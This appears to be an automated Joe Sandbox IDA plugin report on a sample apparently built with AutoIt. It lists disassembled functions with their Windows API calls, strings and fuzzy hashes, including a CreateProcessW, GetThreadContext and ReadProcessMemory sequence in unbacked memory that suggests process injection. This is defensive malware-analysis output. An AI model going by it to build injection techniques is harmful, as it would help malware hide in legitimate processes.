Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 1f91bebbf8d2692476d136c6d11da23d00b100516ee3b0e2dc6c12c898ab641c
Instruction ID: 4e185cd12a2cfc46259196b4b322721650f758f4c27a1db2ac06e6437a7b63b6
Opcode Fuzzy Hash: 1f91bebbf8d2692476d136c6d11da23d00b100516ee3b0e2dc6c12c898ab641c
Instruction Fuzzy Hash: EEB16E72E00129ABDF21EFA4DC85EEEB7BDEF09350F1040A6F509E6151EA709A448F61

Function 00BB3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00BB3B0F,SwapMouseButtons,00000004,?), ref: 00BB3B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00BB3B0F,SwapMouseButtons,00000004,?), ref: 00BB3B61
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00BB3B0F,SwapMouseButtons,00000004,?), ref: 00BB3B83

Strings

Control Panel\Mouse, xrefs: 00BB3B3E

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 8c9363757ad4085d6ce97facbd2802f756650bad1c7e238ba4d0cf8ff1fc88b6
Instruction ID: f347fcef0af1847e5e5f1ff7586feb9236ee75f1a7d460a1a7c2cccfcc3cee1e
Opcode Fuzzy Hash: 8c9363757ad4085d6ce97facbd2802f756650bad1c7e238ba4d0cf8ff1fc88b6
Instruction Fuzzy Hash: 54112AB5511208FFDB208FA5DC84AFEB7F8EF05B44B104599A805D7124D6719E409760

Function 00FAFC90 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00FB04BD
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00FB04E1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00FB0503

Memory Dump Source

Source File: 00000001.00000002.1306941881.0000000000FAE000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FAE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fae000_6mllsKaB2q.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
Instruction ID: 2dd723efe3f5f10df63dd8123d6677b142bf159ab4d059224b63d933cb7fb4d4
Opcode Fuzzy Hash: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
Instruction Fuzzy Hash: 5E62FA30A14258DBEB24CFA5C851BDEB376EF58300F1091A9D10DEB290EB799E81DF59

Function 00BBDFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00C032B7

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 5cfab9d288a008b13381fa542932ca3c18f6c7dbd4d83fbdcba905097b0f0262
Instruction ID: 89d2cc40d1fd3f7f6861d6e589737af8bff8891798597b90319b371811162d5d
Opcode Fuzzy Hash: 5cfab9d288a008b13381fa542932ca3c18f6c7dbd4d83fbdcba905097b0f0262
Instruction Fuzzy Hash: FDC25771A002158FCB24CF58C885BFDB7F5EB08310F2485A9E966AB3A1D3B5ED41CB95

Function 00BB3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00BF33A2

Part of subcall function 00BB6B57: _wcslen.LIBCMT ref: 00BB6B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00BB3A04

Strings

Line: , xrefs: 00BF33EB

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: df37555ed98a9903337e623dcfd649c4ff6965f999b15c894daf9e359b272811
Instruction ID: f80c8f8e10c5e85909519575f582571fb6ff37b4c8897d605a4d81768baf37df
Opcode Fuzzy Hash: df37555ed98a9903337e623dcfd649c4ff6965f999b15c894daf9e359b272811
Instruction Fuzzy Hash: 2031B471408304ABD725EB20DC45BFFB7DCAB40B10F1445AAF599931A1EBF49A49C7C6

Function 00BCFDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00BD0668

Part of subcall function 00BD32A4: RaiseException.KERNEL32(?,?,?,00BD068A,?,00C81444,?,?,?,?,?,?,00BD068A,00BB1129,00C78738,00BB1129), ref: 00BD3304

__CxxThrowException@8.LIBVCRUNTIME ref: 00BD0685

Strings

Unknown exception, xrefs: 00BD0692

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 82ab95500280d77560981deddb4956068ad8ee5b7866da82ca7f2fe67b747b68
Instruction ID: 438e8b0280248e2b3f63b96309ce22e12db8e5710e9dd903110b16480ee63218
Opcode Fuzzy Hash: 82ab95500280d77560981deddb4956068ad8ee5b7866da82ca7f2fe67b747b68
Instruction Fuzzy Hash: E8F0C83490020D77CB04BA64E88AE5DF7ED9E00350F6041F6B914D6692FF71DA59C595

Function 00C23017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00C2302F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00C23044

Strings

aut, xrefs: 00C23038

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 57d0e0b38a689c49ad51676fdec8e7767ab2ef36700174ffffed21584318cbc1
Instruction ID: 6350ff4d0805f39df65ca5240afd9e74aa03cfe85fc1f7bf5a19070c99ce60ec
Opcode Fuzzy Hash: 57d0e0b38a689c49ad51676fdec8e7767ab2ef36700174ffffed21584318cbc1
Instruction Fuzzy Hash: B6D05EB650132867DA70A7A5AC4EFCB3A6CEB05760F0002A1B655E20A1DAF49984CAD4

Function 00C37F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00C382F5
TerminateProcess.KERNEL32(00000000), ref: 00C382FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 00C384DD

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: c5727eefa5cca5e68dd740d149e77a49c9e4b843eaf5710b984f80bb4c523dfe
Instruction ID: 864bf52f1a1f1c0fa1201feab0392f7ef0966b8467be7f2fbd8eeb36666f1507
Opcode Fuzzy Hash: c5727eefa5cca5e68dd740d149e77a49c9e4b843eaf5710b984f80bb4c523dfe
Instruction Fuzzy Hash: B0126A71A183419FC724DF28C484B6ABBE1BF88314F14895DF8998B352DB71E949CF92

Function 00BE5AA9 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73facba10998d568a01f108600a38b2cbae9e5049ba85c327a086ac2f86c237b
Instruction ID: 6dbff48e5e81a73797fcd53ec700b757e7c02d57afc6b27958462c3cc61575f6
Opcode Fuzzy Hash: 73facba10998d568a01f108600a38b2cbae9e5049ba85c327a086ac2f86c237b
Instruction Fuzzy Hash: 5B51907590468A9FCB309FA6C885FEEBBF8EF05318F24009AF405A7392D7719941CB61

Function 00C1C161 Relevance: 4.6, APIs: 3, Instructions: 74timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB3923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00BB3A04

Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C1C259
KillTimer.USER32(?,00000001,?,?), ref: 00C1C261
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C1C270

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: 353693e101a184e705c87c5672c7c7a8f69718d8dc811e095058a4841a745374
Instruction ID: e8d9ba9deb37036cb7f245bcb7e65cb03ed0e28b0ddb70ebc1ae02feecc45bc4
Opcode Fuzzy Hash: 353693e101a184e705c87c5672c7c7a8f69718d8dc811e095058a4841a745374
Instruction Fuzzy Hash: 4C31C370944344AFEB328F64C8D5BEBBBECAB17304F04049AE5EA93241C7745AC5DB51

Function 00BE86AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,?,00BE85CC,?,00C78CC8,0000000C), ref: 00BE8704
GetLastError.KERNEL32(?,00BE85CC,?,00C78CC8,0000000C), ref: 00BE870E
__dosmaperr.LIBCMT ref: 00BE8739

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: 482519c91ac29b3b875ae3882dba305ff09a7687b5042932ba7510e9c03edf2d
Instruction ID: 10fce9fd3c2cda5cc66b391a7ac0b3046233561f8b46b5338fd2c842bbcfb4f1
Opcode Fuzzy Hash: 482519c91ac29b3b875ae3882dba305ff09a7687b5042932ba7510e9c03edf2d
Instruction Fuzzy Hash: ED018E32605AE01EC2706736688577E67C9CF82778F3901D9F81D8B1E2DFA4CC81C254

Function 00BBDB38 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON

Download Yara Rule

APIs

TranslateMessage.USER32(?), ref: 00BBDB7B
DispatchMessageW.USER32(?), ref: 00BBDB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BBDB9F
Sleep.KERNEL32(0000000A), ref: 00BBDBB1
TranslateAcceleratorW.USER32(?,?,?), ref: 00C01CC9

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchPeekSleep
String ID:
API String ID: 3288985973-0
Opcode ID: 9b03bc033a31ddcfd52300330f57a701b5c6242bd2e9db0179b63f57fa2228b5
Instruction ID: 7092d29969ba5e1a91cea631a2ee74a90f6e8a024831b924c913c5d460378854
Opcode Fuzzy Hash: 9b03bc033a31ddcfd52300330f57a701b5c6242bd2e9db0179b63f57fa2228b5
Instruction Fuzzy Hash: 79F05E306453409BEB70CB60CC89FEE73ECEB49351F144668EA1AC30D0EB749548CB25

Function 00C22FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00C22CD4,?,?,?,00000004,00000001), ref: 00C22FF2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00C22CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C23006
CloseHandle.KERNEL32(00000000,?,00C22CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C2300D

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 29ce3f1622b8ce8bbca38582504bb82ae981eb9de38f811f9aa6259afd2b833e
Instruction ID: df1ad033ea63c8610942dceb0c8a1b7148dcf565a4f565dc66fbfdca90a2dd39
Opcode Fuzzy Hash: 29ce3f1622b8ce8bbca38582504bb82ae981eb9de38f811f9aa6259afd2b833e
Instruction Fuzzy Hash: 24E0863628122077D6301759BC4DFCF3A1CE787B71F104210F769750E046A0660142A8

Function 00BC1310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00BC17F6

Strings

CALL, xrefs: 00BC17C6

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: e379b816d9c469a7d8988c11a65254b5fffe1f1a023de9a35b3bffbab3960638
Instruction ID: ee3fb85348a97af474d6e820cd9a0017a8a3572bb80c9c56f2583d42e1eaab2d
Opcode Fuzzy Hash: e379b816d9c469a7d8988c11a65254b5fffe1f1a023de9a35b3bffbab3960638
Instruction Fuzzy Hash: 79227A706082019FC714DF18C884F2ABBF1BF96314F2489ADF4969B3A2D771E955CB92

Function 00C26EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00C26F6B

Part of subcall function 00BB4ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00C81418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BB4EFD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00C26F5A, 00C26F63

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: LibraryLoad_wcslen
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 3312870042-2806939583
Opcode ID: 583d5c33a20341e917c43e777ae6e4f742e57bbd925dda3631bdf6461962519d
Instruction ID: d6f7362a0baf3745f4e24c43eff9ee16e885fd25da20b47de4a54da39995486d
Opcode Fuzzy Hash: 583d5c33a20341e917c43e777ae6e4f742e57bbd925dda3631bdf6461962519d
Instruction Fuzzy Hash: A1B171315082118FCB14EF24D8919BEB7E5EF94300F14899DF496976A2EF70EE49CB92

Function 00BB2DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00BF2C8C

Part of subcall function 00BB3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BB3A97,?,?,00BB2E7F,?,?,?,00000000), ref: 00BB3AC2

Part of subcall function 00BB2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00BB2DC4

Strings

X, xrefs: 00BF2C5A

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: e89be81b8eee789c0e0f96649776c6c029bfca9357855465400edd79b409d9ff
Instruction ID: 343d603ab86c73d415cd0ef123805bb64a64c596b630297d41890bf151f2bde4
Opcode Fuzzy Hash: e89be81b8eee789c0e0f96649776c6c029bfca9357855465400edd79b409d9ff
Instruction Fuzzy Hash: 6A216371A102589FDF41DF94C845BEE7BF8AF49714F008099E509A7241DBF49A49CF61

Function 00C22557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00C22587

Strings

EA06, xrefs: 00C225B9

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: __fread_nolock
String ID: EA06
API String ID: 2638373210-3962188686
Opcode ID: 234822daeee5349c3a56c98939740547675ffe5f2a22a9918e5365b89fc3115f
Instruction ID: f435b75f956a668a6413201c147c0b03a4eb5dc3695dee4b400c1b8a338b05d4
Opcode Fuzzy Hash: 234822daeee5349c3a56c98939740547675ffe5f2a22a9918e5365b89fc3115f
Instruction Fuzzy Hash: 9001B9719042587EDF18D7A8C856FAEBBF8DB05311F00459AE152D62C1E574E708CB60

Function 00BB3837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00BB3908

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: a3c6a1a39695180fac6d9be693463e4a95868671bd5b3491b1f9c57e6e4486ad
Instruction ID: 7206ba7222b8760bc850f9fc44295c08e7335447dd76f2952e82ecbc29f04e44
Opcode Fuzzy Hash: a3c6a1a39695180fac6d9be693463e4a95868671bd5b3491b1f9c57e6e4486ad
Instruction Fuzzy Hash: 4131A270504701DFD721DF24D8847EBBBE8FB49B18F04096EFA9A83250E7B1AA44CB56

Function 00FAFC8D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00FB04BD
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00FB04E1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00FB0503

Memory Dump Source

Source File: 00000001.00000002.1306941881.0000000000FAE000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FAE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fae000_6mllsKaB2q.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
Instruction ID: 99ee7b02e6a62a4f07272f397301ea7550cc2955d6fa0da5b1e6e0d0c459eb04
Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
Instruction Fuzzy Hash: 8212CD24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F85CF5A

Function 00BCFC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00BCFD1F

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
